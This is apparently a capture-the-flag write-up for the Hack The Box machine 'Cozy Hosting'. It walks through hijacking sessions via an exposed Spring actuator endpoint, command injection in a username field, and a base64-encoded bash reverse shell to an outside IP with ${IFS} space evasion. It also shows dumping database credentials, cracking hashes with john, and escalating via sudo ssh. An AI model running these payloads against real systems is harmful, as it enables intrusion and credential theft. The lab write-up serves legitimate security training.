---
slug: /write-up/htb/easy/cozy-hosting
pagination_next: null
pagination_prev: null
---

## Enumeration

Initial scans shows exposed ports 22 and 80

Looks like it's trying to redirect to `http://cozyhosting.htb`. Let's add it to the `/etc/hosts`

```bash
curl -I cozyhosting.htb
HTTP/1.1 200 
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 21 Sep 2023 19:13:45 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
Content-Language: en-US
```

Let's try to explore the directories with gobuster and it could not find anything.

Checking the headers, looks like the Content-Type is application/json, so probably there's an API behind

Checking the error pages seems the one generated by Spring Framework. We can probe that by checking if it has the `/actuator` endpoint public.

Probably the nginx server is acting as a proxy since the actuator returns localhost:8080 as the API address

`/actuator/sessions` returns interesting data:

```
{"71555732BBE84C711A910118954B72C3":"kanderson","24BF9E9AC99A7F02F4006F36634DB3F1":"UNAUTHORIZED","3C47D6E35D00F4B01B7EF0EE5F3305FA":"UNAUTHORIZED","217ABE7CFC46C07AF69818945F9B702E":"kanderson"}
```

## Foothold

If we check the page, looks like there's a login page, if we change the `JSESSIONID` cookie by the value in the `/actuator/sessions` for user `kanderson`, we'll be redirected to the `/admin` page.

Once we enter the admin page we see a form that if we send it will call the `/executessh` endpoint ...

From the error, we could think that is calling the ssh command directly, so maybe this is vulnerable to command injection. We can try to get the output of `id` command.

Looks like hostname is validated somehow, however with username we can break the command execution:

```bash
curl -vvvvv 'http://cozyhosting.htb/executessh' -X POST \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Cookie: JSESSIONID=B762D32C36AE8003E582400AC70E4261' \
--data-raw 'host=localhost&username=`id`'
```

It's pretty hard to know how to make the command execution works, you need to try several combinations with `\`` and `;` and eventually got it working. Now let's open a reverse shell. In order to get the reverse shell, take into account that username cannot have spaces, a minimal validation is done.


To generate the payload that generates the reverse shell:

1. Search a payload here: https://www.revshells.com/
```
/bin/bash -i >& /dev/tcp/10.10.14.183/4444 0>&1
```
2. Let's base64 it:
```
echo "bash -i >& /dev/tcp/10.10.14.183/4444 0>&1" | base64 -w 0
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xODMvNDQ0NCAwPiYxCg==
```
3. Make the payload: echo the base64 payload, then base64 decode the payload and let bash run the payload:
```
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xODMvNDQ0NCAwPiYxCg== | base64 -d | bash
```
You can run that payload and it should create a new connection to the listening nc

4. The endpoint don't link spaces, so let's replace it for the IFS character:

`echo${IFS}"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xODMvNDQ0NCAwPiYxCg=="${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash`

However, if we try that payload, it will complain about whitespaces...

5. Do URL-encode and it will work

Now we have foot-hold in the machine but without a relevant user

## Lateral movement

if we do ls we can see a jarfile, let's download it. Searching inside the jar file, we see a promising thing, the configuration for the postgres database:

```conf
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxR
```

```bash
psql --user postgres --host localhost --port 5432 --password
```

We can find the users database:

```bash
   name    |                           password                           | role
  
-----------+--------------------------------------------------------------+-----
--
 kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
 admin     | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admi
n
```

The password for `kanderson` can be seen in the code and is `MRdEQuv6~6P9`

Nothing seems to indicate the password for user `josh`. Let's try to crack the password for admin with john the ripper:

```bash
john exfil/hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
```

With that password, we can now enter the ssh with user `josh` and we are in and we can read the user flag.

## Privilege escalation

`sudo -l` shows that the user `josh` can run ssh with root privileges, let's check in GTFO bins how to use it to get root access.
